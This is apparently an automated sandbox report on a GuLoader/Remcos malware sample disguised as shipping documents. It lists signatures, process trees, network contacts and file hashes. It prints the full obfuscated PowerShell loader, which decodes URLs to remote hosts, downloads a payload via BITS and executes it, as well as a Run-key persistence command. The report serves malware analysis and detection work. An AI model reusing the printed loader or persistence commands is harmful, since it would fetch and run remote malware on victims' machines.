Malware Analysis Report

2025-06-16 03:44

Sample ID 240325-qhgbkaha28
Target awb_shipping_documents_25_03_2024_000000000.7z
SHA256 a03168474f0454a3249bb978f77f837fe9386f2097387c2e0b87b843aa32a734
Tags
guloader remcos latest downloader persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a03168474f0454a3249bb978f77f837fe9386f2097387c2e0b87b843aa32a734

Threat Level: Known bad

The file awb_shipping_documents_25_03_2024_000000000.7z was found to be: Known bad.

Malicious Activity Summary

guloader remcos latest downloader persistence rat

Guloader,Cloudeye

Remcos

Blocklisted process makes network request

Checks computer location settings

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Modifies registry key

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-25 13:15

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-25 13:15

Reported

2024-03-25 13:18

Platform

win7-20240221-en

Max time kernel

117s

Max time network

121s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_documents_25_03_2024_000000000.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Remcos

rat remcos

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Run\Epizoa213 = "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\\antimakassar\\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)" C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2652 set thread context of 1344 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1736 wrote to memory of 2404 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 2404 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 2404 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2404 wrote to memory of 2672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2404 wrote to memory of 2672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2404 wrote to memory of 2652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2652 wrote to memory of 1204 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2652 wrote to memory of 1204 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2652 wrote to memory of 1204 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2652 wrote to memory of 1204 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2652 wrote to memory of 1344 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2652 wrote to memory of 1344 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2652 wrote to memory of 1344 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2652 wrote to memory of 1344 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2652 wrote to memory of 1344 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2652 wrote to memory of 1344 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1344 wrote to memory of 2796 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1344 wrote to memory of 2796 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1344 wrote to memory of 2796 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1344 wrote to memory of 2796 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2796 wrote to memory of 2648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2796 wrote to memory of 2648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2796 wrote to memory of 2648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_documents_25_03_2024_000000000.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patchy Corporis Vergaloo #>;<#sndagsskolers Paws Alexandrite Skit #>;New-Item -Path 'reservats:\Forfaldt' -Name 'Tiptipoldemoders' -ItemType 'file';<#Conto Perty Rkefjolss blencorn Vitrinernes #>;Function Tulipa ([String]$superofficiously){$Urikonografi = 2;For($Uri=1; $Uri -lt $superofficiously.Length-1; $Uri+=$Urikonografi){ $Urstrukturens = $superofficiously.Substring($Uri, $Forkhead); $Distingverende80=$Distingverende80+$Urstrukturens; }$Distingverende80;}$Forkhead = (cmd /c 'echo 1 && exit');if (Test-Path 'reservats:\Forfaldt\Tiptipoldemoders') {$Forkhead--};$Agillawood224=Tulipa ' i,eRxE ';$Outfound=Tulipa '.TSr a n,s fVeSr,rDi,nDg, ';$Monochordist = Tulipa 'A\Ss yDs wUoJw 6S4H\FW i.n,dHoFw,s PBo,wFePrPSFh,eTl l \Gv 1,. 0K\SpdoAwse,r.sKhue l.lB. e xVe. ';function Forefather ($Firetages){. ($Agillawood224) ($Firetages);}$Strangler=Tulipa '.hPtPtApR: /./V1 4.7D.r7P8.. 1 0h3U.A2 5 0R/ S pUr r eUr eNg e lo. pRsPdB>shGtStOp.: /P/I8.5,.F2 0r9 . 1S7,6M.O4.6,/GSTpCr.r e rSe g,eSl .Sp s.dS ';$Formbrndselsfabrikken236=$Strangler.split([char]62);$Strangler=$Formbrndselsfabrikken236[0];Forefather (Tulipa ' $CgPlSo.bDaBld:BF y sHi,oJt eSrBaGp,eSu.tEsDk oWlRe r =K$AeRnUv.: wTiUntdFiEr ') ;Forefather (Tulipa ' $ g l.opbTa l.:BL,eHvHiSnRe r = $ F yAsHi oRtne rSa,pLeFuPt s kUoMl eFr.+ $AM o n,o cDh,o r dLi s tN ') ;Forefather (Tulipa 'T$ gUlNo b afl :RHPaSa nAd.vArSkNe tEs .=A ,( (Kg wAm iS w iDnU3 2,_,p r.o.c eMs s. -,F. P,rSoZcNeGs s I d =D$,{PP IKD,} )A. C o m m aHn d.L,i n e.). .- s,p lMi t. b[.cPh aJr ] 3B4E ');Forefather (Tulipa ' $ g.lFoCb.a,lg: R dUtA1I8.5D .=, T$AH.aSa n d v r.k e t s [ $ H,aOaSn dLvGrBkEeTt s .FcBo,u.nEtV-M2S] ');Forefather (Tulipa 'A$tgPlRo b,a.l.: OHvhe.rVb eAf oAl k nMiSnSg.eSn,s = (,TOe s t - P,aTt hB .$ L.eVvUifnBe rM) F- AAn dT T(.[ I nst PDtAr ] :P: sKiKzOe M- eEqF 8E) ') ;if ($Overbefolkningens) {& $Leviner $Rdt185;} else {;$Genealogists=Tulipa 'A$ g,l,oTbNa l : M.iGn,i,f iseTdJ ,= ,SAt.a r tS-PB iLtAseTarSa nRs f eNr. -NSToFu r,c e, G$ISOt r a n g,lUe r. -DDSeBs t iknSa tvi.oLn, O$ FEyMs i o t.e,rRaep.eOuPtSs.k,o.l.e.rB ';Forefather (Tulipa '.$Ag lVo b.aTlM: FLySsfiToIt e,rMaFp,eSu.tOsBkRoklbeMr = $,eonKv :Sa pCp d aSt aE ') ;Forefather (Tulipa '.I mMpOowrOtT-.M o dTuAl.e, BEiStEs,T rMa n s f e.rG ') ;$Fysioterapeutskoler=$Fysioterapeutskoler+'\Judicial.Ara' ;Forefather (Tulipa ',$,g l.o b,a lA:ICThDoUl eSlTiItAh.odt.o.m yn= (ST,e sEtN-,P.aGt hS ,$VF,ySsUi,oRt,eAr a.pVeSuNtesTkBo,l e r ), ') ;while (-not $Cholelithotomy) {Forefather (Tulipa ' IAf ( $TM i.n.i fPi eBdK.DJ opbAS.t.aDt ei -Re qH ,$.OWu tNf o u,n d.)F K{YS.tPa,r.tc- SClDeBeVp M1C} etlAs.eN{SSOt a,r tf-NS l eFe pB 1S;TFSoSrBe f aPt h,e.rP ,$.GBeEn.e a lKo g i sot sA}D ');Forefather (Tulipa 'F$Eg.lHokb.a lP:aC hHo,l eMl iVtKhSo tSoRm y = (,T,e s t.-.P aNt,hM K$ FNy,s i ovt eTr.a.pCe u t s k oBlKe r )S ') ;$Strangler=$Formbrndselsfabrikken236[$Precompiler++%$Formbrndselsfabrikken236.count];}Forefather (Tulipa '.$Ggal o,bSaOlA:UP aDsFs.a gHe.r eCrPnRe.sN t=D TGNeAtT-BC o nutUeQn.tD D$,FAy,s iSo.t,e r alpFeRuEtSs.k oIl,eNr ');Forefather (Tulipa 'K$Hg lDo.bBaPlN:DD.uGr o mOeLtHe,rRs = [.S yVsStPe m,. C,o nBv e rDt.]D:R: F ruo,m BPaKs e,6O4DSPtLrSiNnFg (J$ P aGsTs a.gteUr eBr.n e s,) ');Forefather (Tulipa 'I$,g lWo bBaOl.:,V.aSlCm.u.eB S=f S[.SRyFs t eUmB.,TSe x tK. E nFcuo,d iHnKg ].:P:UAPSTC.IVIS.,G.eSt.SFtTr i,n.g (.$ DHu,r.o.m eHtReDrKs )H ');Forefather (Tulipa ' $ g l.o,bPaAl,:SCueNp.h a.l o,cHhCoSr dEaS=A$,V a.lEm,uSe,.Ps,u b,s tUrHiFnKg (.2E9R1I1M8L6S, 2 3K4S0E0C)S ');Forefather $Cephalochorda;};;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo 1 && exit"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Patchy Corporis Vergaloo #>;<#sndagsskolers Paws Alexandrite Skit #>;New-Item -Path 'reservats:\Forfaldt' -Name 'Tiptipoldemoders' -ItemType 'file';<#Conto Perty Rkefjolss blencorn Vitrinernes #>;Function Tulipa ([String]$superofficiously){$Urikonografi = 2;For($Uri=1; $Uri -lt $superofficiously.Length-1; $Uri+=$Urikonografi){ $Urstrukturens = $superofficiously.Substring($Uri, $Forkhead); $Distingverende80=$Distingverende80+$Urstrukturens; }$Distingverende80;}$Forkhead = (cmd /c 'echo 1 && exit');if (Test-Path 'reservats:\Forfaldt\Tiptipoldemoders') {$Forkhead--};$Agillawood224=Tulipa ' i,eRxE ';$Outfound=Tulipa '.TSr a n,s fVeSr,rDi,nDg, ';$Monochordist = Tulipa 'A\Ss yDs wUoJw 6S4H\FW i.n,dHoFw,s PBo,wFePrPSFh,eTl l \Gv 1,. 0K\SpdoAwse,r.sKhue l.lB. e xVe. ';function Forefather ($Firetages){. ($Agillawood224) ($Firetages);}$Strangler=Tulipa '.hPtPtApR: /./V1 4.7D.r7P8.. 1 0h3U.A2 5 0R/ S pUr r eUr eNg e lo. pRsPdB>shGtStOp.: /P/I8.5,.F2 0r9 . 1S7,6M.O4.6,/GSTpCr.r e rSe g,eSl .Sp s.dS ';$Formbrndselsfabrikken236=$Strangler.split([char]62);$Strangler=$Formbrndselsfabrikken236[0];Forefather (Tulipa ' $CgPlSo.bDaBld:BF y sHi,oJt eSrBaGp,eSu.tEsDk oWlRe r =K$AeRnUv.: wTiUntdFiEr ') ;Forefather (Tulipa ' $ g l.opbTa l.:BL,eHvHiSnRe r = $ F yAsHi oRtne rSa,pLeFuPt s kUoMl eFr.+ $AM o n,o cDh,o r dLi s tN ') ;Forefather (Tulipa 'T$ gUlNo b afl :RHPaSa nAd.vArSkNe tEs .=A ,( (Kg wAm iS w iDnU3 2,_,p r.o.c eMs s. -,F. P,rSoZcNeGs s I d =D$,{PP IKD,} )A. C o m m aHn d.L,i n e.). .- s,p lMi t. b[.cPh aJr ] 3B4E ');Forefather (Tulipa ' $ g.lFoCb.a,lg: R dUtA1I8.5D .=, T$AH.aSa n d v r.k e t s [ $ H,aOaSn dLvGrBkEeTt s .FcBo,u.nEtV-M2S] ');Forefather (Tulipa 'A$tgPlRo b,a.l.: OHvhe.rVb eAf oAl k nMiSnSg.eSn,s = (,TOe s t - P,aTt hB .$ L.eVvUifnBe rM) F- AAn dT T(.[ I nst PDtAr ] :P: sKiKzOe M- eEqF 8E) ') ;if ($Overbefolkningens) {& $Leviner $Rdt185;} else {;$Genealogists=Tulipa 'A$ g,l,oTbNa l : M.iGn,i,f iseTdJ ,= ,SAt.a r tS-PB iLtAseTarSa nRs f eNr. -NSToFu r,c e, G$ISOt r a n g,lUe r. -DDSeBs t iknSa tvi.oLn, O$ FEyMs i o t.e,rRaep.eOuPtSs.k,o.l.e.rB ';Forefather (Tulipa '.$Ag lVo b.aTlM: FLySsfiToIt e,rMaFp,eSu.tOsBkRoklbeMr = $,eonKv :Sa pCp d aSt aE ') ;Forefather (Tulipa '.I mMpOowrOtT-.M o dTuAl.e, BEiStEs,T rMa n s f e.rG ') ;$Fysioterapeutskoler=$Fysioterapeutskoler+'\Judicial.Ara' ;Forefather (Tulipa ',$,g l.o b,a lA:ICThDoUl eSlTiItAh.odt.o.m yn= (ST,e sEtN-,P.aGt hS ,$VF,ySsUi,oRt,eAr a.pVeSuNtesTkBo,l e r ), ') ;while (-not $Cholelithotomy) {Forefather (Tulipa ' IAf ( $TM i.n.i fPi eBdK.DJ opbAS.t.aDt ei -Re qH ,$.OWu tNf o u,n d.)F K{YS.tPa,r.tc- SClDeBeVp M1C} etlAs.eN{SSOt a,r tf-NS l eFe pB 1S;TFSoSrBe f aPt h,e.rP ,$.GBeEn.e a lKo g i sot sA}D ');Forefather (Tulipa 'F$Eg.lHokb.a lP:aC hHo,l eMl iVtKhSo tSoRm y = (,T,e s t.-.P aNt,hM K$ FNy,s i ovt eTr.a.pCe u t s k oBlKe r )S ') ;$Strangler=$Formbrndselsfabrikken236[$Precompiler++%$Formbrndselsfabrikken236.count];}Forefather (Tulipa '.$Ggal o,bSaOlA:UP aDsFs.a gHe.r eCrPnRe.sN t=D TGNeAtT-BC o nutUeQn.tD D$,FAy,s iSo.t,e r alpFeRuEtSs.k oIl,eNr ');Forefather (Tulipa 'K$Hg lDo.bBaPlN:DD.uGr o mOeLtHe,rRs = [.S yVsStPe m,. C,o nBv e rDt.]D:R: F ruo,m BPaKs e,6O4DSPtLrSiNnFg (J$ P aGsTs a.gteUr eBr.n e s,) ');Forefather (Tulipa 'I$,g lWo bBaOl.:,V.aSlCm.u.eB S=f S[.SRyFs t eUmB.,TSe x tK. E nFcuo,d iHnKg ].:P:UAPSTC.IVIS.,G.eSt.SFtTr i,n.g (.$ DHu,r.o.m eHtReDrKs )H ');Forefather (Tulipa ' $ g l.o,bPaAl,:SCueNp.h a.l o,cHhCoSr dEaS=A$,V a.lEm,uSe,.Ps,u b,s tUrHiFnKg (.2E9R1I1M8L6S, 2 3K4S0E0C)S ');Forefather $Cephalochorda;};;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo 1 && exit"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epizoa213" /t REG_EXPAND_SZ /d "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\antimakassar\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epizoa213" /t REG_EXPAND_SZ /d "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\antimakassar\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)"

Network

Country Destination Domain Proto
NL 147.78.103.250:80 147.78.103.250 tcp
NL 147.78.103.250:80 147.78.103.250 tcp

Files

C:\Users\Admin\AppData\Local\Temp\Tar40FB.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\Local\Temp\Cab40F8.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\Tar467D.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

memory/2404-75-0x000000001B3A0000-0x000000001B682000-memory.dmp

memory/2404-76-0x0000000002460000-0x0000000002468000-memory.dmp

memory/2404-77-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

memory/2404-78-0x00000000024D0000-0x0000000002550000-memory.dmp

memory/2404-79-0x00000000024D0000-0x0000000002550000-memory.dmp

memory/2404-80-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

memory/2404-81-0x00000000024D0000-0x0000000002550000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IP3KYTWLGLS12BKGRK4S.temp

MD5 e6855b698fbeceacb3b4c96de7246444
SHA1 fa81d0a6e58baa9bb4256a36e5594c00d0cb257a
SHA256 75d6628cd01af0afc387545948b4fc74f2204bddf969772f57d57effc2b85ae9
SHA512 80995c986c267f6ee94a4129c99fbe2e2929ce8786ec5275558ba4db771807da8aaeaebee7eb66ab8bc053652c3132a4e4a6f0e171c836adc4dffc0fe15e8ebe

memory/2652-84-0x0000000072FE0000-0x000000007358B000-memory.dmp

memory/2652-85-0x0000000072FE0000-0x000000007358B000-memory.dmp

memory/2652-86-0x0000000002620000-0x0000000002660000-memory.dmp

memory/2652-87-0x0000000002620000-0x0000000002660000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 56806503d509b74473ee9cd6de3ee361
SHA1 99d3ebf5f6726c1bd224349d858d15cef1d76835
SHA256 03c56f28cf9424b093882e6d5bc0edcbcffe15315348046f6e5d4f7ef6bccc2f
SHA512 3a618c9e42f0741be6a57a126554cdaaed87eae96ef78accf5f91753a320a96f3ad5b38d327eb539e44274f1a6e57962ab00addfaaac9a7a119404fd903e774f

memory/2404-99-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

memory/2404-100-0x00000000024D0000-0x0000000002550000-memory.dmp

memory/2404-101-0x00000000024D0000-0x0000000002550000-memory.dmp

memory/2404-102-0x00000000024D0000-0x0000000002550000-memory.dmp

memory/2404-103-0x00000000024D0000-0x0000000002550000-memory.dmp

memory/2652-104-0x0000000072FE0000-0x000000007358B000-memory.dmp

memory/2652-106-0x0000000002620000-0x0000000002660000-memory.dmp

memory/2652-105-0x0000000072FE0000-0x000000007358B000-memory.dmp

memory/2652-107-0x0000000002620000-0x0000000002660000-memory.dmp

memory/2652-108-0x0000000005E30000-0x0000000005F30000-memory.dmp

memory/2652-111-0x0000000005C40000-0x0000000005C41000-memory.dmp

memory/2652-112-0x00000000064D0000-0x00000000084C4000-memory.dmp

memory/2652-113-0x00000000064D0000-0x00000000084C4000-memory.dmp

memory/2652-114-0x0000000076FA0000-0x0000000077149000-memory.dmp

memory/2652-115-0x0000000002620000-0x0000000002660000-memory.dmp

memory/2652-116-0x0000000005E30000-0x0000000005F30000-memory.dmp

memory/2652-117-0x0000000077190000-0x0000000077266000-memory.dmp

memory/1344-118-0x0000000001500000-0x00000000034F4000-memory.dmp

memory/2652-119-0x00000000064D0000-0x00000000084C4000-memory.dmp

memory/1344-120-0x0000000076FA0000-0x0000000077149000-memory.dmp

memory/1344-121-0x00000000771C6000-0x00000000771C7000-memory.dmp

memory/1344-122-0x0000000077190000-0x0000000077266000-memory.dmp

memory/1344-123-0x0000000000490000-0x00000000014F2000-memory.dmp

memory/1344-125-0x0000000077190000-0x0000000077266000-memory.dmp

memory/1344-124-0x0000000001500000-0x00000000034F4000-memory.dmp

memory/2652-127-0x0000000072FE0000-0x000000007358B000-memory.dmp

memory/2652-129-0x00000000064D0000-0x00000000084C4000-memory.dmp

memory/2404-130-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-25 13:15

Reported

2024-03-25 13:18

Platform

win10v2004-20240226-en

Max time kernel

160s

Max time network

162s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_documents_25_03_2024_000000000.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Epizoa213 = "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\\antimakassar\\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)" C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2648 set thread context of 3620 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3768 wrote to memory of 1188 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3768 wrote to memory of 1188 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1188 wrote to memory of 4512 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1188 wrote to memory of 4512 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1188 wrote to memory of 2648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1188 wrote to memory of 2648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1188 wrote to memory of 2648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2648 wrote to memory of 4296 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2648 wrote to memory of 4296 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2648 wrote to memory of 4296 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2648 wrote to memory of 3620 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2648 wrote to memory of 3620 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2648 wrote to memory of 3620 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2648 wrote to memory of 3620 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2648 wrote to memory of 3620 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3620 wrote to memory of 184 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3620 wrote to memory of 184 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
